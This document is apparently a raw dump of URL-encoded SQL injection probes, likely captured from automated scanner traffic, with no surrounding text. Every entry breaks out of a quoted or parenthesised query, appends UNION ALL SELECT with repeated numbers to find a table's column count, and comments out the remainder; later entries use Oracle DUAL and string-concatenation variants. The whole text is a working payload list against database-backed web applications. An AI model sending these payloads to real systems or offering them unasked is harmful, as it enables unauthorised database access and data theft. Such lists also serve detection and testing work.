-6648%22%29%20UNION%20ALL%20SELECT%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%2C%205042%23%20AND%20%28%22uwTG%22%20LIKE%20%22uwTG -5469%22%29%20UNION%20ALL%20SELECT%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%23%20AND%20%28%22NQuN%22%20LIKE%20%22NQuN -7969%22%29%20UNION%20ALL%20SELECT%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%23%20AND%20%28%22tsFB%22%20LIKE%20%22tsFB -1413%22%29%20UNION%20ALL%20SELECT%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%23%20AND%20%28%22Dhni%22%20LIKE%20%22Dhni -2572%22%29%20UNION%20ALL%20SELECT%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%23%20AND%20%28%22LRVj%22%20LIKE%20%22LRVj -5354%22%29%20UNION%20ALL%20SELECT%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%2C%208183%23%20AND%20%28%22iJbJ%22%20LIKE%20%22iJbJ -6917%22%29%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%23%20AND%20%28%22jewK%22%20LIKE%20%22jewK -8094%22%29%29%20UNION%20ALL%20SELECT%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%23%20AND%20%28%28%22CwBQ%22%20LIKE%20%22CwBQ -2665%22%29%29%20UNION%20ALL%20SELECT%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%23%20AND%20%28%28%22uPOx%22%20LIKE%20%22uPOx -1936%22%29%29%20UNION%20ALL%20SELECT%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%2C%206329%23%20AND%20%28%28%22paox%22%20LIKE%20%22paox -8961%22%29%29%20UNION%20ALL%20SELECT%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%2C%201042%23%20AND%20%28%28%22sKwH%22%20LIKE%20%22sKwH -5901%22%29%29%20UNION%20ALL%20SELECT%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%23%20AND%20%28%28%22VXDK%22%20LIKE%20%22VXDK -3110%22%29%29%20UNION%20ALL%20SELECT%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%23%20AND%20%28%28%22pHCB%22%20LIKE%20%22pHCB -6210%22%29%29%20UNION%20ALL%20SELECT%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%2C%204743%23%20AND%20%28%28%22spOc%22%20LIKE%20%22spOc -8561%22%29%29%20UNION%20ALL%20SELECT%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%2C%203922%23%20AND%20%28%28%22iOvC%22%20LIKE%20%22iOvC -1763%22%29%29%20UNION%20ALL%20SELECT%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%2C%202738%23%20AND%20%28%28%22erIf%22%20LIKE%20%22erIf -5354%22%29%29%20UNION%20ALL%20SELECT%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%2C%201306%23%20AND%20%28%28%22udEd%22%20LIKE%20%22udEd -7082%22%29%29%29%20UNION%20ALL%20SELECT%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%2C%208002%23%20AND%20%28%28%28%22mXDn%22%20LIKE%20%22mXDn -7676%22%29%29%29%20UNION%20ALL%20SELECT%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%23%20AND%20%28%28%28%22tbjy%22%20LIKE%20%22tbjy -3049%22%29%29%29%20UNION%20ALL%20SELECT%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%23%20AND%20%28%28%28%22veDr%22%20LIKE%20%22veDr -5100%22%29%29%29%20UNION%20ALL%20SELECT%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%2C%206655%23%20AND%20%28%28%28%22FYHx%22%20LIKE%20%22FYHx -9644%22%29%29%29%20UNION%20ALL%20SELECT%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%2C%206197%23%20AND%20%28%28%28%22yMmI%22%20LIKE%20%22yMmI -6017%22%29%29%29%20UNION%20ALL%20SELECT%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%2C%203639%23%20AND%20%28%28%28%22wWAm%22%20LIKE%20%22wWAm -3492%22%29%29%29%20UNION%20ALL%20SELECT%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%2C%205910%23%20AND%20%28%28%28%22iGhu%22%20LIKE%20%22iGhu -7311%22%29%29%29%20UNION%20ALL%20SELECT%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%2C%201529%23%20AND%20%28%28%28%22bwoS%22%20LIKE%20%22bwoS -3670%22%29%29%29%20UNION%20ALL%20SELECT%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%23%20AND%20%28%28%28%22XGsO%22%20LIKE%20%22XGsO -4613%22%29%29%29%20UNION%20ALL%20SELECT%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%2C%209119%23%20AND%20%28%28%28%22jMvg%22%20LIKE%20%22jMvg -2414%22%20UNION%20ALL%20SELECT%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%2C%209853%23%20AND%20%22dPUw%22%20LIKE%20%22dPUw -9751%22%20UNION%20ALL%20SELECT%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%23%20AND%20%22iaBO%22%20LIKE%20%22iaBO -4939%22%20UNION%20ALL%20SELECT%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%2C%207868%23%20AND%20%22EIop%22%20LIKE%20%22EIop -5569%22%20UNION%20ALL%20SELECT%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%23%20AND%20%22lmmH%22%20LIKE%20%22lmmH -3153%22%20UNION%20ALL%20SELECT%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%23%20AND%20%22ePqM%22%20LIKE%20%22ePqM -7879%22%20UNION%20ALL%20SELECT%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%2C%201335%23%20AND%20%22TYqf%22%20LIKE%20%22TYqf -3832%22%20UNION%20ALL%20SELECT%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%2C%207569%23%20AND%20%22RRcj%22%20LIKE%20%22RRcj -7092%22%20UNION%20ALL%20SELECT%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%2C%201955%23%20AND%20%22ALBE%22%20LIKE%20%22ALBE -1403%22%20UNION%20ALL%20SELECT%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%2C%201657%23%20AND%20%22GPWl%22%20LIKE%20%22GPWl -7345%22%20UNION%20ALL%20SELECT%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%23%20AND%20%22ZMEp%22%20LIKE%20%22ZMEp -4104%29%20WHERE%206574%3D6574%20UNION%20ALL%20SELECT%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%23 -9362%29%20WHERE%208062%3D8062%20UNION%20ALL%20SELECT%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%2C%208062%23 -1372%29%20WHERE%207618%3D7618%20UNION%20ALL%20SELECT%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%2C%207618%23 -3270%29%20WHERE%209621%3D9621%20UNION%20ALL%20SELECT%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%2C%209621%23 -6250%29%20WHERE%204902%3D4902%20UNION%20ALL%20SELECT%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%2C%204902%23 -9539%29%20WHERE%207003%3D7003%20UNION%20ALL%20SELECT%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%23 -4925%29%20WHERE%202892%3D2892%20UNION%20ALL%20SELECT%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%23 -1040%29%20WHERE%202362%3D2362%20UNION%20ALL%20SELECT%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%23 -7930%29%20WHERE%205714%3D5714%20UNION%20ALL%20SELECT%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%2C%205714%23 -8486%29%20WHERE%206834%3D6834%20UNION%20ALL%20SELECT%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%2C%206834%23 -5289%27%29%20WHERE%206910%3D6910%20UNION%20ALL%20SELECT%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%23 -9907%27%29%20WHERE%203440%3D3440%20UNION%20ALL%20SELECT%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%23 -7475%27%29%20WHERE%205873%3D5873%20UNION%20ALL%20SELECT%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%2C%205873%23 -4213%27%29%20WHERE%209522%3D9522%20UNION%20ALL%20SELECT%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%2C%209522%23 -3327%27%29%20WHERE%208456%3D8456%20UNION%20ALL%20SELECT%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%23 -6463%27%29%20WHERE%205187%3D5187%20UNION%20ALL%20SELECT%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%2C%205187%23 -5211%27%29%20WHERE%207636%3D7636%20UNION%20ALL%20SELECT%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%23 -2730%27%29%20WHERE%202862%3D2862%20UNION%20ALL%20SELECT%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%2C%202862%23 -7228%27%29%20WHERE%203505%3D3505%20UNION%20ALL%20SELECT%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%2C%203505%23 -8168%27%29%20WHERE%203660%3D3660%20UNION%20ALL%20SELECT%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%23 -7769%27%20WHERE%202176%3D2176%20UNION%20ALL%20SELECT%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%2C%202176%23 -9870%27%20WHERE%209678%3D9678%20UNION%20ALL%20SELECT%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%23 -2505%27%20WHERE%204056%3D4056%20UNION%20ALL%20SELECT%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%2C%204056%23 -6667%27%20WHERE%208885%3D8885%20UNION%20ALL%20SELECT%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%23 -8676%27%20WHERE%209458%3D9458%20UNION%20ALL%20SELECT%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%23 -8385%27%20WHERE%201402%3D1402%20UNION%20ALL%20SELECT%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%23 -6509%27%20WHERE%202292%3D2292%20UNION%20ALL%20SELECT%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%2C%202292%23 -4914%27%20WHERE%208605%3D8605%20UNION%20ALL%20SELECT%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%23 -6217%27%20WHERE%206342%3D6342%20UNION%20ALL%20SELECT%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%2C%206342%23 -1887%27%20WHERE%203677%3D3677%20UNION%20ALL%20SELECT%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%2C%203677%23 -8743%22%20WHERE%205309%3D5309%20UNION%20ALL%20SELECT%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%23 -8384%22%20WHERE%202388%3D2388%20UNION%20ALL%20SELECT%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%23 -3686%22%20WHERE%206606%3D6606%20UNION%20ALL%20SELECT%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%2C%206606%23 -7723%22%20WHERE%207573%3D7573%20UNION%20ALL%20SELECT%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%23 -3142%22%20WHERE%207062%3D7062%20UNION%20ALL%20SELECT%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%2C%207062%23 -5040%22%20WHERE%209664%3D9664%20UNION%20ALL%20SELECT%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%2C%209664%23 -9889%22%20WHERE%209465%3D9465%20UNION%20ALL%20SELECT%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%23 -3277%22%20WHERE%203825%3D3825%20UNION%20ALL%20SELECT%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%23 -1511%22%20WHERE%201226%3D1226%20UNION%20ALL%20SELECT%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%2C%201226%23 -2447%22%20WHERE%202359%3D2359%20UNION%20ALL%20SELECT%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%23 -7658%27%20%7C%7C%20%28SELECT%204026%20FROM%20DUAL%20WHERE%209427%3D9427%20UNION%20ALL%20SELECT%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%2C%209427%23%20%29%20%7C%7C%20%27 -7143%27%20%7C%7C%20%28SELECT%206779%20FROM%20DUAL%20WHERE%204259%3D4259%20UNION%20ALL%20SELECT%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%2C%204259%23%20%29%20%7C%7C%20%27 -7183%27%20%7C%7C%20%28SELECT%203299%20FROM%20DUAL%20WHERE%204377%3D4377%20UNION%20ALL%20SELECT%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%23%20%29%20%7C%7C%20%27 -7053%27%20%7C%7C%20%28SELECT%208567%20FROM%20DUAL%20WHERE%202051%3D2051%20UNION%20ALL%20SELECT%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%2C%202051%23%20%29%20%7C%7C%20%27 -4127%27%20%7C%7C%20%28SELECT%203198%20FROM%20DUAL%20WHERE%202047%3D2047%20UNION%20ALL%20SELECT%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%2C%202047%23%20%29%20%7C%7C%20%27 -5161%27%20%7C%7C%20%28SELECT%208936%20FROM%20DUAL%20WHERE%206347%3D6347%20UNION%20ALL%20SELECT%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%23%20%29%20%7C%7C%20%27 -5424%27%20%7C%7C%20%28SELECT%208829%20FROM%20DUAL%20WHERE%202141%3D2141%20UNION%20ALL%20SELECT%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%23%20%29%20%7C%7C%20%27 -8841%27%20%7C%7C%20%28SELECT%208106%20FROM%20DUAL%20WHERE%205884%3D5884%20UNION%20ALL%20SELECT%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%2C%205884%23%20%29%20%7C%7C%20%27 -1499%27%20%7C%7C%20%28SELECT%204344%20FROM%20DUAL%20WHERE%203101%3D3101%20UNION%20ALL%20SELECT%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%23%20%29%20%7C%7C%20%27 -8556%27%20%7C%7C%20%28SELECT%208731%20FROM%20DUAL%20WHERE%206853%3D6853%20UNION%20ALL%20SELECT%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%2C%206853%23%20%29%20%7C%7C%20%27 -1247%27%20%7C%7C%20%28SELECT%205817%20WHERE%203487%3D3487%20UNION%20ALL%20SELECT%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%2C%203487%23%20%29%20%7C%7C%20%27 -6517%27%20%7C%7C%20%28SELECT%206843%20WHERE%202608%3D2608%20UNION%20ALL%20SELECT%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%23%20%29%20%7C%7C%20%27 -1827%27%20%7C%7C%20%28SELECT%201581%20WHERE%203163%3D3163%20UNION%20ALL%20SELECT%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%2C%203163%23%20%29%20%7C%7C%20%27 -7952%27%20%7C%7C%20%28SELECT%206020%20WHERE%202420%3D2420%20UNION%20ALL%20SELECT%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%23%20%29%20%7C%7C%20%27 -8730%27%20%7C%7C%20%28SELECT%209505%20WHERE%204147%3D4147%20UNION%20ALL%20SELECT%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%2C%204147%23%20%29%20%7C%7C%20%27 -9715%27%20%7C%7C%20%28SELECT%209845%20WHERE%207003%3D7003%20UNION%20ALL%20SELECT%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%2C%207003%23%20%29%20%7C%7C%20%27 -6859%27%20%7C%7C%20%28SELECT%209459%20WHERE%209509%3D9509%20UNION%20ALL%20SELECT%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%23%20%29%20%7C%7C%20%27 -8795%27%20%7C%7C%20%28SELECT%209757%20WHERE%208189%3D8189%20UNION%20ALL%20SELECT%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%23%20%29%20%7C%7C%20%27 -6745%27%20%7C%7C%20%28SELECT%205500%20WHERE%205936%3D5936%20UNION%20ALL%20SELECT%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%2C%205936%23%20%29%20%7C%7C%20%27 -7803%27%20%7C%7C%20%28SELECT%207543%20WHERE%209903%3D9903%20UNION%20ALL%20SELECT%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%2C%209903%23%20%29%20%7C%7C%20%27 -2041%20%2B%20%28SELECT%205781%20FROM%20DUAL%20WHERE%204697%3D4697%20UNION%20ALL%20SELECT%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%2C%204697%23%20%29 -8621%20%2B%20%28SELECT%206929%20FROM%20DUAL%20WHERE%202848%3D2848%20UNION%20ALL%20SELECT%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%23%20%29 -3184%20%2B%20%28SELECT%204381%20FROM%20DUAL%20WHERE%209973%3D9973%20UNION%20ALL%20SELECT%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%2C%209973%23%20%29 -1752%20%2B%20%28SELECT%201807%20FROM%20DUAL%20WHERE%209776%3D9776%20UNION%20ALL%20SELECT%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%2C%209776%23%20%29 -1897%20%2B%20%28SELECT%208225%20FROM%20DUAL%20WHERE%203109%3D3109%20UNION%20ALL%20SELECT%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%2C%203109%23%20%29 -7483%20%2B%20%28SELECT%208147%20FROM%20DUAL%20WHERE%208834%3D8834%20UNION%20ALL%20SELECT%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%23%20%29 